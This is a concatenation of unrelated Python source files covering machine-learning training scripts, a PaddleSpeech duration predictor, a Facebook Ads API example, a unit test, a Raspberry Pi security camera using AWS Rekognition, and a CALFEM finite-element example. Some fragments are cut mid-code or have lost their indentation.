client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
#return w_glob, loss_avg
if self.args.hvp_method == 'seperate':
hg_glob, comm_round = self.lfed_out(client_locals)
return w_glob, loss_avg, hg_glob, comm_round
if self.args.hvp_method == 'seperate_svrg':
hg_glob, comm_round = self.lfed_out_svrg(client_locals)
return w_glob, loss_avg, hg_glob, comm_round
else:
raise NotImplementedError
|
''' Work of Cameron Palk '''
import sys
import os.path
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
def displayAccuracyGraph( X, Y ):
    '''Scatter-plot accuracy (converted to percent) against forest size.'''
    percentages = [ 100 * accuracy for accuracy in Y ]
    plt.plot( X, percentages, 'bo' )
    plt.title( 'Random Forest: Accuracy vs. Tree Count' )
    plt.ylabel( 'Accuracy' )
    plt.xlabel( 'Trees in Forest' )
    plt.grid( True )
    plt.show()
def printStart( n ):
    '''Log the wall-clock time at which training of n trees begins.'''
    timestamp = datetime.now()
    print( "{} Started training {} trees".format( timestamp, n ) )
def printStop( n ):
    '''Log the wall-clock time at which training of n trees finished.'''
    timestamp = datetime.now()
    print( "{} Stopped training {} trees".format( timestamp, n ) )
def main( argv ):
    '''Train random forests of 1..max trees, recording test accuracy.

    argv: [script, training_csv, testing_csv, temp_checkpoint, output].
    Progress is checkpointed to <temp> (one "n:accuracy" line per forest)
    so an interrupted run resumes where it left off; finally the
    accuracy-vs-size curve is plotted.
    '''
    try:
        training_filename = argv[ 1 ]
        testing_filename = argv[ 2 ]
        temp_filename = argv[ 3 ]
        output_filename = argv[ 4 ]
    except IndexError:
        print( "Error, usage: \"python3 {} <training> <testing> <temp> <output>\"".format( argv[ 0 ] ) )
        return

    from sklearn.ensemble import RandomForestClassifier

    # Hyper Parameters
    max_n_estimators = 100 # default 10

    # Re-load any previous progress from the temp checkpoint file.
    temp_rows = []
    if os.path.isfile( temp_filename ):
        with open( temp_filename, 'r' ) as temp_stream:
            temp_raw = temp_stream.read().strip()
            temp_rows = temp_raw.split( '\n' ) if len( temp_raw ) > 0 else []

    tree_accuracies = []
    for row in temp_rows:
        n_str, acc_str = row.split( ':' )
        tree_accuracies.append( ( int( n_str ), float( acc_str ) ) )

    start_idx = len( tree_accuracies ) + 1  # Start where our previous progress ended

    if start_idx < max_n_estimators:
        if start_idx > 1:
            print( "Resuming progress at {:4} trees.".format( start_idx ) )
        else:
            print( "No progress found in temp file, starting with {:4} trees.".format( start_idx ) )

        # Read training data; last column is the label.
        # BUG FIX: DataFrame.ix was deprecated and then removed from pandas;
        # .iloc provides the same purely-positional slicing.
        Training_DataFrame = pd.read_csv( training_filename )
        X = Training_DataFrame.iloc[:, 0:-1]
        Y = Training_DataFrame.iloc[:, -1]

        # Read testing data
        Testing_DataFrame = pd.read_csv( testing_filename )
        test_X = Testing_DataFrame.iloc[:, 0:-1]
        test_Y = Testing_DataFrame.iloc[:, -1]

        for n_trees in range( start_idx, max_n_estimators + 1 ):
            printStart( n_trees )
            RF_classifier = RandomForestClassifier(
                n_estimators = n_trees,
                min_samples_split = 10
            )
            RF_classifier.fit( X, Y )
            printStop( n_trees )

            RF_score = RF_classifier.score( test_X, test_Y )
            tree_accuracies.append( ( n_trees, RF_score ) )

            # Append this result so an interrupted run can resume.
            with open( temp_filename, 'a' ) as temp_stream_append:
                temp_stream_append.write( "{}:{}\n".format( n_trees, RF_score ) )

            print( "Completed {:4} / {} trees : accuracy = {}%".format( n_trees, max_n_estimators, round( RF_score * 100, 3 ) ) )

    # NOTE(review): output_filename is accepted but never written -- confirm
    # whether the final accuracies were meant to be saved there.
    X_labels = [ label[ 0 ] for label in tree_accuracies ]
    Y_labels = [ label[ 1 ] for label in tree_accuracies ]
    displayAccuracyGraph( X_labels, Y_labels )

#
if __name__=='__main__':
    main( sys.argv )
|
import numpy as np
from sympy import count_ops, preorder_traversal
from sympy.parsing.sympy_parser import parse_expr
from .S_get_number_DL_snapped import get_number_DL_snapped
def get_expr_complexity(expr):
    """Compute the description-length complexity of a symbolic expression.

    Parameters
    ----------
    expr : str
        Expression string in a form accepted by sympy's ``parse_expr``.

    Returns
    -------
    float
        Sum of the description lengths of all numeric constants plus an
        ``(n_variables + n_operations) * log2(n_variables + n_operations)``
        term for the symbolic structure.
    """
    expr = parse_expr(expr)
    compl = 0

    def is_atomic_number(subexpr):
        # numeric leaf nodes (integers, rationals, floats) of the tree
        return subexpr.is_Atom and subexpr.is_number

    numbers_expr = [
        subexpression
        for subexpression in preorder_traversal(expr)
        if is_atomic_number(subexpression)
    ]
    for number in numbers_expr:
        try:
            compl += get_number_DL_snapped(float(number))
        except Exception:
            # BUG FIX: the original bare ``except:`` also swallowed
            # KeyboardInterrupt/SystemExit; catch only real errors.
            # Unrepresentable constant -> large fixed penalty.
            compl += 1000000
    # structural complexity: distinct free symbols plus operation kinds
    n_variables = len(expr.free_symbols)
    n_operations = len(count_ops(expr, visual=True).free_symbols)
    if n_operations != 0 or n_variables != 0:
        compl += (n_variables + n_operations) * np.log2(
            n_variables + n_operations
        )
    return compl
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified from espnet(https://github.com/espnet/espnet)
"""Duration predictor related modules."""
import paddle
from paddle import nn
from paddlespeech.t2s.modules.layer_norm import LayerNorm
from paddlespeech.t2s.modules.masked_fill import masked_fill
class DurationPredictor(nn.Layer):
    """Duration predictor module.

    Predicts a duration for every frame (in the log domain) from the
    encoder's hidden embeddings, following
    `FastSpeech: Fast, Robust and Controllable Text to Speech`_.

    .. _`FastSpeech: Fast, Robust and Controllable Text to Speech`:
        https://arxiv.org/pdf/1905.09263.pdf

    Note
    ----------
    `forward` produces values in the log domain while `inference`
    produces values in the linear domain.
    """

    def __init__(self,
                 idim,
                 n_layers=2,
                 n_chans=384,
                 kernel_size=3,
                 dropout_rate=0.1,
                 offset=1.0):
        """Initilize duration predictor module.

        Parameters
        ----------
        idim : int
            Input dimension.
        n_layers : int, optional
            Number of convolutional layers.
        n_chans : int, optional
            Number of channels of convolutional layers.
        kernel_size : int, optional
            Kernel size of convolutional layers.
        dropout_rate : float, optional
            Dropout rate.
        offset : float, optional
            Offset value to avoid nan in log domain.
        """
        super().__init__()
        self.offset = offset
        self.conv = nn.LayerList()
        for layer_idx in range(n_layers):
            # first layer maps from the input dimension, the rest are n_chans
            input_channels = idim if layer_idx == 0 else n_chans
            conv_block = nn.Sequential(
                nn.Conv1D(
                    input_channels,
                    n_chans,
                    kernel_size,
                    stride=1,
                    padding=(kernel_size - 1) // 2, ),
                nn.ReLU(),
                LayerNorm(n_chans, dim=1),
                nn.Dropout(dropout_rate), )
            self.conv.append(conv_block)
        # final projection to a single duration value per frame
        self.linear = nn.Linear(n_chans, 1, bias_attr=True)

    def _forward(self, xs, x_masks=None, is_inference=False):
        # (B, Tmax, idim) -> (B, idim, Tmax): Conv1D expects channels first
        hidden = xs.transpose([0, 2, 1])
        for conv_block in self.conv:
            hidden = conv_block(hidden)
        # project back and drop the channel axis -> (B, Tmax), log domain
        durations = self.linear(hidden.transpose([0, 2, 1])).squeeze(-1)
        if is_inference:
            # move to the linear domain: round(exp(x) - offset), floored at 0
            durations = paddle.clip(
                paddle.round(durations.exp() - self.offset), min=0)
        if x_masks is not None:
            # zero out predictions on padded positions
            durations = masked_fill(durations, x_masks, 0.0)
        return durations

    def forward(self, xs, x_masks=None):
        """Calculate forward propagation.

        Parameters
        ----------
        xs : Tensor
            Batch of input sequences (B, Tmax, idim).
        x_masks : ByteTensor, optional
            Batch of masks indicating padded part (B, Tmax).

        Returns
        ----------
        Tensor
            Batch of predicted durations in log domain (B, Tmax).
        """
        return self._forward(xs, x_masks, False)

    def inference(self, xs, x_masks=None):
        """Inference duration.

        Parameters
        ----------
        xs : Tensor
            Batch of input sequences (B, Tmax, idim).
        x_masks : Tensor(bool), optional
            Batch of masks indicating padded part (B, Tmax).

        Returns
        ----------
        Tensor
            Batch of predicted durations in linear domain int64 (B, Tmax).
        """
        return self._forward(xs, x_masks, True)
class DurationPredictorLoss(nn.Layer):
    """MSE loss for the duration predictor.

    The loss is computed in the log domain so the residuals are closer
    to Gaussian.
    """

    def __init__(self, offset=1.0, reduction="mean"):
        """Initilize duration predictor loss module.

        Parameters
        ----------
        offset : float, optional
            Offset value to avoid nan in log domain.
        reduction : str
            Reduction type in loss calculation.
        """
        super().__init__()
        self.offset = offset
        self.criterion = nn.MSELoss(reduction=reduction)

    def forward(self, outputs, targets):
        """Calculate forward propagation.

        Parameters
        ----------
        outputs : Tensor
            Batch of prediction durations in log domain (B, T)
        targets : Tensor
            Batch of groundtruth durations in linear domain (B, T)

        Returns
        ----------
        Tensor
            Mean squared error loss value.

        Note
        ----------
        `outputs` is in log domain but `targets` is in linear domain.
        """
        # map the linear-domain targets into the predictor's log domain
        log_targets = paddle.log(targets.cast(dtype='float32') + self.offset)
        return self.criterion(outputs, log_targets)
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
"""
Creates several ads using batch calls.
"""
from facebook_business import FacebookSession
from facebook_business import FacebookAdsApi
from facebook_business.objects import (
AdAccount,
Ad,
AdSet,
)
import ad_creation_utils
import json
import os
# Load app credentials from config.json next to this script.
this_dir = os.path.dirname(__file__)
config_filename = os.path.join(this_dir, 'config.json')
# IMPROVEMENT: use a context manager so the file handle is closed even if
# json.load raises (the original opened/closed the file manually).
with open(config_filename) as config_file:
    config = json.load(config_file)
### Setup session and api objects
session = FacebookSession(
    config['app_id'],
    config['app_secret'],
    config['access_token'],
)
api = FacebookAdsApi(session)
if __name__ == '__main__':
    # Make this session the default so object calls below need no explicit api.
    FacebookAdsApi.set_default_api(api)
    # Get my account (first account associated with the user associated with the
    # session of the default api)
    my_account = AdAccount.get_my_account()
    #####################
    # Create multiple ads
    #####################
    print('**** Creating multiple ads...')
    # Create my ads (will use batch calling) -- one ad per title/body combination.
    my_ads = ad_creation_utils.create_multiple_website_clicks_ads(
        account=my_account,
        name="Visit Seattle - Many Ads Experiment",
        country='US',
        titles=["Visit Seattle", "Seattle Tourism"],
        bodies=[
            "New York Alki",
            "Pittsburgh of the west",
            "The Queen City",
            "Jet City",
            "Lesser Seattle",
            "The Emerald City",
            "The Next City",
        ],
        urls=["http://www.seattle.gov/visiting/"],
        image_paths=[
            os.path.join(
                os.path.dirname(__file__),
                os.pardir,
                'facebook_business/test/misc/image.png'
            )
        ],
        bid_type=AdSet.BidType.cpm,
        bid_info={AdSet.Field.BidInfo.impressions: 53},  # $0.53 / thousand
        daily_budget=3000,  # $30.00 per day
        age_min=13,
        age_max=65,
        paused=True,  # Default is False but let's keep this test ad paused
    )
    for ad in my_ads:
        print("created ad: %s" % str(ad[Ad.Field.creative]))
    # Print out api statistics
    print("\nHTTP Request Statistics: %s attempted, %s succeeded." % (
        api.get_num_requests_attempted(),
        api.get_num_requests_succeeded(),
    ))
|
from unittest import TestCase
import torch
from torch.nn import CrossEntropyLoss
from loss.top_k_cross_entropy_loss import TopKCrossEntropyLoss
class TestTopKCrossEntropyLoss(TestCase):
    """TopKCrossEntropyLoss should equal a plain CrossEntropyLoss restricted
    to the k highest-loss samples of the batch."""

    def test_forward(self):
        # Arrange: batch of 3 samples, 3 timesteps, 2 classes each
        k = 2
        predicted = torch.tensor([
            [[0.5, .5], [.7, 0.3], [0.0, 1.0]],
            [[0.2, .8], [.8, 0.2], [0.0, 1.0]],
            [[0.5, .5], [1.0, 0.0], [0.0, 1.0]],
        ])
        target = torch.tensor([
            [0, 1, 0],
            [0, 1, 0],
            [0, 1, 0],
        ])
        # samples 1 and 2 carry the largest per-sample losses
        indices_high_loss = torch.tensor([1, 2])
        expected_loss = CrossEntropyLoss()(
            predicted[indices_high_loss, :].permute(0, 2, 1),
            target[indices_high_loss, :])
        sut = TopKCrossEntropyLoss(k)

        # Act
        actual = sut.forward(predicted.permute(0, 2, 1), target)

        # Assert: agreement to two decimal places
        self.assertEqual(round(expected_loss.item(), 2), round(actual.item(), 2))
|
#!/usr/bin/python3
import boto3
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
import picamera
import time
import json
from io import BytesIO
# Relative JPEG-size change that counts as "scene changed" in use_camera.
CHANGE_THRESHOLD = 0.005
# Seconds between camera polls in the main loop.
SLEEP_TIME = 3
CLIENT_ID = 'pyzcam'
PUBLISH_TOPIC = CLIENT_ID + '/out'
SUBSCRIBE_TOPIC = CLIENT_ID + '/in'
AWS_IOT_ENDPOINT = '<YOUR_AWS_IOT_ENDPOINT>'
REKOGNITION_COLLECTION_ID = 'security-camera'
S3_BUCKET = '<YOUR_S3_BUCKET>'
# Timestamp placeholder is filled in by upload_image_and_get_key.
S3_IMAGE_KEY = 'pizero/image-{}.jpg'
S3_SEEN_KEY = 'pizero/seen.json'
s3 = boto3.client('s3')
rekognition = boto3.client('rekognition')
# Create an in-memory stream
image = BytesIO()
camera = picamera.PiCamera()
# camera.start_preview()
def enable_camera():
    '''Switch the polling loop on and reset the frame-size tracker so the
    first size comparison cannot fire a false change event.'''
    print('Camera enabled')
    use_camera.camera_enabled = True
    use_camera.size = 0
def disable_camera():
    '''Switch the camera polling loop off.'''
    print('Camera disabled')
    use_camera.camera_enabled = False
def index_face(name):
    """Capture a photo, upload it to S3 and index the face in the
    Rekognition collection under ``name`` (used as the ExternalImageId)."""
    print('Indexing {}...'.format(name))
    take_picture(camera, image)
    key=upload_image_and_get_key(image)
    response=rekognition.index_faces(
        CollectionId=REKOGNITION_COLLECTION_ID,
        Image={
            'S3Object': {
                'Bucket': S3_BUCKET,
                'Name': key,
            }
        },
        ExternalImageId=name,
        DetectionAttributes=['ALL']
    )
    print(json.dumps(response, indent=4))
def message_received(client, userdata, message):
    '''MQTT callback: dispatch "camera" (enable/disable/use) and "index"
    commands received as JSON payloads.'''
    print('Received a new message: ')
    print(message.payload)
    print('from topic: ')
    print(message.topic)
    print('--------------\n\n')
    payload = json.loads(message.payload.decode('utf-8'))
    if 'camera' in payload:
        command = payload['camera']
        if command == 'enable':
            enable_camera()
        elif command == 'disable':
            disable_camera()
        elif command == 'use':
            # one-shot capture regardless of the polling loop state
            use_camera(once=True)
        else:
            print('Unknown camera state: {}'.format(command))
    elif 'index' in payload:
        index_face(payload['index'].capitalize())
    else:
        print('Unknown command: {}'.format(json.dumps(payload, indent=4)))
def take_picture(camera, image):
    '''Rewind the in-memory stream and capture a fresh JPEG frame into it,
    overwriting the previous frame.'''
    image.seek(0)
    camera.capture(image, 'jpeg')
def use_camera(once=False):
    """Take a picture; upload and analyse it when warranted.

    State is kept as function attributes set elsewhere (enable_camera/main):
    ``use_camera.size`` is the previous JPEG size and
    ``use_camera.camera_enabled`` gates the polling loop.
    With once=True the frame is always processed; otherwise it is processed
    only when the JPEG size changed by more than CHANGE_THRESHOLD
    (size change as a cheap proxy for scene change).
    """
    take_picture(camera, image)
    if not once:
        previous_size=use_camera.size
        use_camera.size=image.tell()
        if (previous_size > 0):
            size_change=abs(1 - use_camera.size / previous_size)
        else:
            # first frame after enabling: nothing to compare against
            size_change=0
        print('size: {0} - previous: {1} - change: {2}'.format(use_camera.size,
            previous_size, size_change))
    # NOTE: when once=True the `or` short-circuits, so size_change
    # is intentionally never evaluated here.
    if (once or size_change > CHANGE_THRESHOLD):
        key=upload_image_and_get_key(image)
        analyse_image(key)
def upload_image_and_get_key(image):
    """Upload the in-memory JPEG to S3 under a timestamped key.

    Returns the S3 object key so the caller can reference the image later.
    """
    print('Uploading image to Amazon S3...')
    # rewind so put_object reads the full frame from the start
    image.seek(0)
    key=S3_IMAGE_KEY.format(time.strftime('%Y%m%d%H%M%S'))
    print('key = {}'.format(key))
    response=s3.put_object(
        Bucket=S3_BUCKET,
        Key=key,
        Body=image
    )
    print(json.dumps(response, indent=4))
    return key
def upload_seen(file):
    """Upload the JSON analysis results to the fixed S3 "seen" key.

    NOTE(review): the parameter name ``file`` shadows a builtin and actually
    receives a JSON string, not a file object -- consider renaming.
    """
    print('Uploading file to Amazon S3...')
    print('key = {}'.format(S3_SEEN_KEY))
    response=s3.put_object(
        Bucket=S3_BUCKET,
        Key=S3_SEEN_KEY,
        Body=file
    )
    print(json.dumps(response, indent=4))
def analyse_image(key):
    """Analyse an uploaded image with Amazon Rekognition and upload results.

    Pipeline: detect labels; if a 'Person' label is present, detect faces;
    if any face is found, also look for celebrities and for known faces in
    the collection.  Everything seen is accumulated into one JSON document
    and uploaded via upload_seen.
    """
    # Use Amazon Rekognition
    print('Calling Amazon Rekognition...')
    seen = {}
    seen['Image'] = {
        'Bucket': S3_BUCKET,
        'Key': key,
    }
    print('Looking for labels...')
    response=rekognition.detect_labels(
        Image={
            'S3Object': {
                'Bucket': S3_BUCKET,
                'Name': key,
            }
        },
        MaxLabels=5,
        MinConfidence=70,
    )
    seen['Labels'] = response['Labels']
    print(json.dumps(seen['Labels'], indent=4))
    if any('Person' in l['Name'] for l in response['Labels']):
        # There is at least a person
        print('Looking for faces...')
        response=rekognition.detect_faces(
            Image={
                'S3Object': {
                    'Bucket': S3_BUCKET,
                    'Name': key,
                }
            },
            Attributes=['ALL']
        )
        seen['FaceDetails'] = response['FaceDetails']
        print(json.dumps(seen['FaceDetails'], indent=4))
        if len(response['FaceDetails']) > 0:
            # At least one face found...
            print('Looking for celebrities...')
            response=rekognition.recognize_celebrities(
                Image={
                    'S3Object': {
                        'Bucket': S3_BUCKET,
                        'Name': key,
                    }
                }
            )
            seen['CelebrityFaces'] = response['CelebrityFaces']
            print(json.dumps(seen['CelebrityFaces'], indent=4))
            print('Looking for known faces...')
            response=rekognition.search_faces_by_image(
                CollectionId=REKOGNITION_COLLECTION_ID,
                Image={
                    'S3Object': {
                        'Bucket': S3_BUCKET,
                        'Name': key,
                    }
                }
            )
            seen['FaceMatches'] = response['FaceMatches']
            print(json.dumps(seen['FaceMatches'], indent=4))
    # persist whatever was recognized, even if no person was present
    upload_seen(json.dumps(seen))
def main():
    """Connect to AWS IoT over WebSockets, subscribe for commands and
    poll the camera forever (the loop starts with the camera disabled)."""
    print('Connecting to AWS IoT...')
    myMQTTClient=AWSIoTMQTTClient(CLIENT_ID, useWebsocket=True)
    myMQTTClient.configureCredentials('./rootCA.txt')
    myMQTTClient.configureEndpoint(AWS_IOT_ENDPOINT, 443) # WebSockets
    myMQTTClient.connect()
    print('Publishing to AWS IoT...')
    myMQTTClient.publish(PUBLISH_TOPIC, 'myPayload', 0)
    print('Subscribing to AWS IoT...')
    myMQTTClient.subscribe(SUBSCRIBE_TOPIC, 1, message_received)
    print('Ready to Go!')
    # camera loop starts disabled; an MQTT "enable" command switches it on
    use_camera.camera_enabled = False
    while True:
        # Camera warm-up time
        time.sleep(SLEEP_TIME)
        if use_camera.camera_enabled:
            use_camera()

main()
|
import pandas as pd
import numpy as np
import sys
import getopt
from sklearn import feature_extraction
from sklearn.cross_validation import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
sys.path.append('/Users/ef/xgboost/wrapper')
import xgboost as xgb
import random
from sklearn.metrics import log_loss
import os
def load_train_data(path):
    """Load and shuffle the training CSV, then append engineered features.

    The CSV layout is: id column first, raw features in the middle, the
    class label last.

    Returns (X_feats, y, ids, encoder) where y holds integer-encoded labels.
    """
    df = pd.read_csv(path)
    X = df.values.copy()
    # fixed seed so the shuffle (and downstream CV folds) is reproducible
    np.random.seed(seed=2015)
    np.random.shuffle(X)
    X, labels, ids = X[:, 1:-1].astype(np.float32), X[:, -1], X[:, 0].astype(str)
    # IMPROVEMENT: the original hand-unrolled one nearly identical block per
    # log base; this loop builds exactly the same feature matrix in the same
    # column order (raw, log2, log3..log9, log12, log13, ln, sqrt, square).
    X_feats = np.append(X, np.floor(np.log2(X + 1)), axis=1)
    for base in (3, 4, 5, 6, 7, 8, 9, 12, 13):
        X_feats = np.append(X_feats, np.floor(np.log(X + 1) / np.log(base)), axis=1)
    X_feats = np.append(X_feats, np.floor(np.log(X + 1)), axis=1)
    X_feats = np.append(X_feats, np.floor(np.sqrt(X + 1)), axis=1)
    X_feats = np.append(X_feats, np.power(X + 1, 2), axis=1)
    encoder = LabelEncoder()
    y = encoder.fit_transform(labels).astype(np.int32)
    return X_feats, y, ids, encoder
def load_test_data(path):
    """Load the test CSV and append the same engineered features as training.

    The CSV layout is: id column first, raw features after it (no label).

    Returns (X_feats, ids).
    """
    df = pd.read_csv(path)
    X = df.values.copy()
    X, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)
    # IMPROVEMENT: same loop-based feature engineering as load_train_data,
    # replacing the original hand-unrolled blocks; the column order is
    # unchanged (raw, log2, log3..log9, log12, log13, ln, sqrt, square).
    X_feats = np.append(X, np.floor(np.log2(X + 1)), axis=1)
    for base in (3, 4, 5, 6, 7, 8, 9, 12, 13):
        X_feats = np.append(X_feats, np.floor(np.log(X + 1) / np.log(base)), axis=1)
    X_feats = np.append(X_feats, np.floor(np.log(X + 1)), axis=1)
    X_feats = np.append(X_feats, np.floor(np.sqrt(X + 1)), axis=1)
    X_feats = np.append(X_feats, np.power(X + 1, 2), axis=1)
    return X_feats, ids
def compute_fold(train_index, valid_index, X, y, X_test, ids_train, ids_test):
    """Train one CV fold and return stacked validation + test predictions.

    NOTE(review): relies on the module-level globals ``plst``, ``num_round``
    and ``num_classes`` being set by the main script before this is called.
    ``y_valid`` is computed but never used -- confirm whether a validation
    score was intended.
    """
    X_train, X_valid = X[train_index], X[valid_index]
    y_train, y_valid = y[train_index], y[valid_index]
    # shuffle the training rows before building the DMatrix
    index_shuffle = [i for i in range(X_train.shape[0])]
    random.shuffle(index_shuffle)
    xgmat_train = xgb.DMatrix( X_train[index_shuffle,:], label=y_train[index_shuffle], missing = -999.0)
    bst = xgb.train( plst, xgmat_train, num_round );
    #prediction on valid
    xgmat_valid = xgb.DMatrix( X_valid, missing = -999.0 )
    y_pred = bst.predict( xgmat_valid )
    preds_train = pd.DataFrame(y_pred, columns=['Class_'+str(i+1) for i in range(num_classes)])
    preds_train['id'] = ids_train[valid_index]
    preds_train['set'] = 1  # 1 marks out-of-fold (validation) rows
    #prediction on test
    xgmat_test = xgb.DMatrix( X_test, missing = -999.0 )
    y_pred = bst.predict( xgmat_test )
    preds_test = pd.DataFrame(y_pred, columns=['Class_'+str(i+1) for i in range(num_classes)])
    preds_test['id'] = ids_test
    preds_test['set'] = 0  # 0 marks test-set rows
    preds = preds_train.append(preds_test, ignore_index=True)
    return preds
# Parse command-line options (long forms: --train/--test/--pred/--cv/--folds).
opts, args = getopt.getopt(sys.argv[1:], "t:v:p:c:f:", ["train=", "test=", "pred=", "cv=", "folds="])
opts = {x[0]:x[1] for x in opts}
train_file = opts['--train']
test_file = opts['--test']
pred_file = opts['--pred']
#epoch = int(opts['--epoch'])
epoch = 10  # number of differently-configured xgboost runs (fixed)
cv = int(opts['--cv'])
nfolds = int(opts['--folds'])
target_col = 'target'
if cv == 0:
    # no cross-validation requested; folds are still built but unused
    nfolds = 2
X, y, ids_train, encoder = load_train_data(train_file)
X_test, ids_test = load_test_data(test_file)
num_classes = len(encoder.classes_)
num_features = X.shape[1]
skf = StratifiedKFold(y, nfolds, random_state=2015)
# record the ids in out-of-fold order, for later alignment of predictions
ids_train_folds = np.empty(0)
for train_index, valid_index in skf:
    ids_train_folds = np.append(ids_train_folds, ids_train[valid_index])
# Base xgboost parameters shared by every iteration; the per-iteration
# settings (depth, child weight, column sampling, rounds) are filled in below.
param = {}
param['objective'] = 'multi:softprob'
param['eval_metric'] = 'mlogloss'
param['eta'] = 0.05
param['silent'] = 1
param['num_class'] = 9
param['nthread'] = 6
for e in range(epoch):
print "processing iteration", e
param['seed'] = 3015 + (10*e)
if e == 0:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 500
if e == 1:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.024
param['colsample_bytree'] = 1.0
num_round = 400
if e == 2:
param['max_depth'] = 30
param['min_child_weight'] = 1
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 550
if e == 3:
param['max_depth'] = 50
param['min_child_weight'] = 3
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 400
if e == 4:
param['max_depth'] = 50
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.018
param['colsample_bytree'] = 1.0
num_round = 400
if e == 5:
param['max_depth'] = 50
param['min_child_weight'] = 8
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 650
if e == 6:
param['max_depth'] = 40
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 500
if e == 7:
param['max_depth'] = 14
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.024
param['colsample_bytree'] = 1.0
num_round = 750
if e == 8:
param['max_depth'] = 14
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.036
param['colsample_bytree'] = 1.0
num_round = 650
if e == 9:
param['max_depth'] = 19
param['min_child_weight'] = 5
param['colsample_bylevel'] = 0.012
param['colsample_bytree'] = 1.0
num_round = 750
plst = list(param.items())
if cv == 0:
index_shuffle = [i for i in range(X.shape[0])]
random.shuffle(index_shuffle)
xgmat_train = xgb.DMatrix( X[index_shuffle,:], label=y[index_shuffle], missing = -999.0)
bst = xgb.train( plst, xgmat_train, num_round );
xgmat_test = xgb.DMatrix( X_test, missing = -999.0 )
preds = pd.DataFrame(bst.predict( xgmat_test ), columns=['Class_'+str(i+1) for i in range(num_classes)])
preds['id'] = ids_test
preds.to_csv('../data/output-py/test_raw/' + os.path.splitext(pred_file)[0] + '.epoch' + str(e) + '.csv', index=False)
else:
count = 0
for train_index, valid_index in skf:
print "processing fold", count+1
preds_fold = compute_fold(train_index, valid_index, X, y, X_test, ids_train, ids_test)
if count == 0:
preds = preds_fold.copy()
else:
preds = preds.append(preds_fold)
count += 1
preds.to_csv('../data/output-py/train_raw/' + os.path.splitext(pred_file)[0] + '.epoch' + str(e) + '.csv', index=False)
|
# -*- coding: utf-8 -*-
#
# example exm0_mpl.py
# ----------------------------------------------------------------
# PURPOSE
# Setup a finite element flow model using the mesh functions
# in CALFEM.
# ----------------------------------------------------------------
#
# REFERENCES
# J Lindemann 2021-12-29
# ----------------------------------------------------------------
# ----- Import needed modules ------------------------------------
import numpy as np
import calfem.core as cfc
import calfem.geometry as cfg
import calfem.mesh as cfm
import calfem.vis_mpl as cfv
import calfem.utils as cfu
# ----- Problem parameters ---------------------------------------
w = 100.0  # domain width
h = 10.0   # domain height
t = 1.0    # barrier thickness
d = h/2    # barrier depth (half the domain height)
D = np.identity(2, 'float')  # isotropic unit constitutive matrix
ep = [1.0, 1]  # element properties -- presumably [thickness, integration rule]; verify against flw2i4e docs
# ----- Create geometry object -----------------------------------
g = cfg.Geometry()
g.point([0, 0])          # point 1
g.point([w, 0])          # point 2
g.point([w, h])          # point 3
g.point([w-w/2+t/2, h])  # point 4
g.point([w-w/2+t/2, h-d])  # point 5
g.point([w-w/2-t/2, h-d])  # point 6
g.point([w-w/2-t/2, h])  # point 7
g.point([0, h])          # point 8
# ----- Create lines between points ------------------------------
# Boundary markers used later to apply the boundary conditions.
left_side = 80
right_side = 90
g.spline([0, 1])
g.spline([1, 2])
g.spline([2, 3], marker=left_side)  # marker just to name
g.spline([3, 4])
g.spline([4, 5])
g.spline([5, 6])
g.spline([6, 7], marker=right_side)
g.spline([7, 0])
# ----- Make surface area ----------------------------------------
g.surface([0, 1, 2, 3, 4, 5, 6, 7])
# ----- Mesh generation ------------------------------------------
el_type = 3       # 4-node quadrilateral element
dofs_per_node = 1 # 1 dof (scalar potential/flow problem)
# ----- Set mesh parameters --------------------------------------
mesh = cfm.GmshMesh(g)
mesh.el_size_factor = 1.0
mesh.el_type = el_type
mesh.dofs_per_node = dofs_per_node
# ----- Create mesh ----------------------------------------------
coords, edof, dofs, bdofs, elementmarkers = mesh.create()
# ----- Assemble elements ----------------------------------------
nDofs = np.size(dofs)
ex, ey = cfc.coordxtr(edof, coords, dofs)
